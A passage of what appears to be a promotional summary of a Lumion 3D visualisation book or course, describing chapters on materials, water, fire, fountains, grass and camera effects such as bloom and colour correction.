can find under the Effects label, is called Sun study. It is an amazing feature that allows us to select any point on the planet and mimic the Sun in that location. However, there is much more that we can do with this effect. Lumion has more than 500 materials on hand and generally this is more than adequate. Still, Lumion is a very flexible application, and for this reason, you are not fixed with just these materials. We have the opportunity to use our own textures to create other materials. Lumion is not going to show you all the settings that you can use to tweak the material; instead, we are going to focus on how we can replace and adjust an outside texture. Making a 3D model invisible or hiding surfaces from our 3D model is something that we don't anticipate to do in every project. However, there are times when the Invisible material can be very handy, and Lumion demonstrates not only how to apply it, but also some specific situations that we may consider while using this material. Glass is essential in any project we work. From the glass in a complex window to a simple cup made of glass, this material has a deep impact on a still image and even more on a movie, helping us capture the light and reflections of the environment. Lumion has a glass material that can be used to create some of these materials. The Glass material can be manipulated to get a more realistic look. During the production, it is expected that we save the materials applied to the 3D models. This should be done for precaution purposes, in case something goes wrong or when we need to go back and forth with materials, without having to lose any settings. Lumion has an option to save the materials you applied to a 3D model and later on load them again, if necessary. There is another feature that Lumion is going to show you which will give you a chance to save a single material instead of material sets. There are different ways in which we can add water to our project. We can create an ocean as easily as reading this sentence, and the same is true when we need to add a body of water or create a swimming pool. However, what if we want to create a fountain? Let's go even further: can we create a river? Lumion will teach you how easy is to create a streaming water effect. Another beautiful and eye-catching effect is when we have glowing materials in our project. From light bulbs to TV screens, we can add an extra touch to our scene by using the Standard material to create this glow effect. Lumion will teach you not only how to add this glow, but also how you can use textures to produce interesting effects. After adding trees, bushes, and other plants, the next thing you should add to the project is some grass. Prior to Lumion Version 4, you had to be satisfied with the terrain's texture. We can also import some grass, though, the project would become very heavy. You can also add some grass from the Lumion library and adjust that grass in the best way possible. Now, Lumion provides an option to use realistic grass, bringing that whoa factor. Each material has a certain amount of reflection, and this is a setting that we can adjust in almost every material that we can find in Lumion. Taking into account that Lumion is a real-time application, it is natural that in some cases, the reflections don't meet our requirements in terms of accuracy. Lumion has an effect that we can apply to surfaces in our 3D model to improve these reflections. While applying and tweaking materials, you can cross a section in your 3D model where you can easily see some flickering. Although this should be avoided, there is an inbuilt setting in every Lumion material to correct this problem. Fire is a special effect that is accessible in Lumion and is one of those elements that can bring an ordinary scene to life. We may have a living room that per se is excellent with all the materials and light, but when we add fire to the fireplace, it completely transforms the room into a warm, comfortable, and welcoming living room. Alternatively, consider how the same living room can be changed to introduce a romantic scene when illuminated with candles and a fireplace. Lumion is aimed to help you apply fire and control it using the Edit properties menu. In addition to the solid and liquid elements in Lumion, we can find elements that we could label as non-solid. Lumion has a special section for these elements, opening with the smoke, passing all the way through dust, and then finishing with fog and water vapor. How we can place these elements in our project and a realistic application of some of them is what Lumion will teach you. Fountains have their distinctive place in Lumion, and there is a tab dedicated to different categories of fountains. We can separate this tab into two parts: standard fountains and fountains produced by a waterspray emitter. Lumion is aimed to show you where to find these fountains, how to place them in the scene, and also provide you with some useful applications. Falling leaves are an enjoyable extra touch that can improve our still image or movie. Nevertheless, like the preceding special effects, this one needs to be used in the correct amount. Too much can ruin the scene, making the viewer focus more on leaves passing through the screen than actually focus on the 3D model. We can add text to a movie or a still image using the Titles effect, but in some circumstances, we need a text element with some more flexibility. Sometimes, when working on a presentation of a project, we are required to show some additional information; this can be easily achieved using this fantastic feature available in Lumion. We can add text to our project in the Build mode. A clip plane is an object that can be added to a scene and later used in the Movie mode, and it can be animated to produce a kind of reveling effect. Initially, it may seem a little bit confusing, you will understand how to apply it to your scene and animate this plane. It is time to move from special effects, such as fire, smoke, and water that we can add to the scene and move towards effects that we can apply in both the Movie and Photo modes. Lumion gives you an overview of how general effects work, how you can stack them in either the Movie or Photo mode, and how you can control them. It is logical that all the effects available in Lumion are applied using either the Movie or Photo mode. The reason for this is that if all those effects were applied to the Build mode, they would have a massive impact on the performance of the viewport, slowing down our workflow. However, Lumion likes to provide you with the freedom needed to produce the best result possible, and in some situations, it could be useful to check the effects in the Build mode. Bloom is the halo effect caused principally by bright lights in the scene. In real world, the camera lenses we use can never focus perfectly, but this is not a problem under normal conditions. However, when there is an intensely bright light in the scene, these imperfections are perceptible and visible, and as a consequence, in the photo that we would shoot, the bright light will appear to bleed beyond its usual borders. Purple fringing, distortion, and blurred edges are a combination of errors called chromatic aberration. A simple explanation is that chromatic aberration happens when there is a failure on the part of lens to focus or bring all the wavelengths of colors to the same focal plane. As light travels through this lens, the different colors travel at different speeds and go to different places on the camera's sensor. With 3D cameras, this doesn't happen, but we can add chromatic aberration to our image or video, giving an extra touch of realism. The expression "color correction" has a fair number of different meanings. However, generally speaking, we can say that it is a means to repair problems with the color, and we do that by changing the color of a pixel to another color or by tweaking other settings. In Lumion, this means that we can use color correction to either achieve a certain look or to enhance the overall aspect and mood of an image or a movie. We can use this effect in Lumion and apply a few tips to help us not only to correct the color, but also perform some color grading.
Read more
  • 0
  • 0
  • 3454
Modal Close icon
Modal Close icon